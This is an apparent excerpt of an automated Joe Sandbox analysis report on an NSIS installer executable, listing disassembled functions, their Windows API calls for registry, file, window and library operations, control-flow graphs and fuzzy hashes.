                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%s.dll$UXTHEME$\
                                • API String ID: 2200240437-4240819195
                                • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                Function 004020CA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 734 4020ca-4020d6 735 402191-402193 734->735 736 4020dc-4020f2 call 402c5e * 2 734->736 737 40230a-40230f call 401423 735->737 745 402101-40210f LoadLibraryExA 736->745 746 4020f4-4020ff GetModuleHandleA 736->746 744 402aea-402af9 737->744 748 402111-40211e GetProcAddress 745->748 749 40218a-40218c 745->749 746->745 746->748 751 402120-402126 748->751 752 40215d-402162 call 4053d1 748->752 749->737 753 402128-402134 call 401423 751->753 754 40213f-40215b 751->754 756 402167-40216a 752->756 753->756 765 402136-40213d 753->765 754->756 756->744 758 402170-402178 call 403a36 756->758 758->744 764 40217e-402185 FreeLibrary 758->764 764->744 765->756
                                APIs
                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                  • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                  • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,00000000,00422E40,755723A0), ref: 0040542D
                                  • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 0040543F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                  • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                • String ID: Under i$
                                • API String ID: 2987980305-278772426
                                • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 766 401c53-401c73 call 402c3c * 2 771 401c75-401c7c call 402c5e 766->771 772 401c7f-401c83 766->772 771->772 774 401c85-401c8c call 402c5e 772->774 775 401c8f-401c95 772->775 774->775 778 401ce3-401d09 call 402c5e * 2 FindWindowExA 775->778 779 401c97-401cb3 call 402c3c * 2 775->779 791 401d0f 778->791 789 401cd3-401ce1 SendMessageA 779->789 790 401cb5-401cd1 SendMessageTimeoutA 779->790 789->791 792 401d12-401d15 790->792 791->792 793 402aea-402af9 792->793 794 401d1b 792->794 794->793
                                APIs
                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 797 4024a3-4024ca call 402c5e * 2 call 402cee 803 4024cf-4024d4 797->803 804 402aea-402af9 803->804 805 4024da-4024e4 803->805 807 4024f4-4024f7 805->807 808 4024e6-4024f3 call 402c5e lstrlenA 805->808 811 4024f9-40250d call 402c3c 807->811 812 40250e-402511 807->812 808->807 811->812 813 402522-402536 RegSetValueExA 812->813 814 402513-40251d call 403168 812->814 818 402538 813->818 819 40253b-402618 RegCloseKey 813->819 814->813 818->819 819->804
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000023,00000011,00000002), ref: 004024EE
                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 0040252E
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseValuelstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nsz930C.tmp
                                • API String ID: 2655323295-3232026250
                                • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18
                                Function 00405D0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 822 405d0d-405d28 call 40628d call 405cb8 827 405d2a-405d2c 822->827 828 405d2e-405d3b call 406587 822->828 829 405d80-405d82 827->829 832 405d47-405d49 828->832 833 405d3d-405d41 828->833 835 405d5f-405d68 lstrlenA 832->835 833->827 834 405d43-405d45 833->834 834->827 834->832 836 405d6a-405d7e call 405c1f GetFileAttributesA 835->836 837 405d4b-405d52 call 406620 835->837 836->829 842 405d54-405d57 837->842 843 405d59-405d5a call 405c66 837->843 842->827 842->843 843->835
                                APIs
                                  • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                  • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405D60
                                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 3248276644-3077356548
                                • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                Function 00405E4F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 00405E63
                                • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-1331003597
                                • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                  • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,000000F0), ref: 00401661
                                Strings
                                • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede, xrefs: 00401656
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede
                                • API String ID: 1892508949-3557324615
                                • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                Function 00406174 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Remove folder: ,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 004061C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Remove folder:
                                • API String ID: 3356406503-1958208860
                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                Function 004025B5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                Function 00405A07 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                  • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A22
                                • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$Attributes$DeleteDirectoryRemove
                                • String ID:
                                • API String ID: 1655745494-0
                                • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                                • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                                Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                Download Yara Rule
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                Function 00405897 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                • GetLastError.KERNEL32 ref: 004058E7
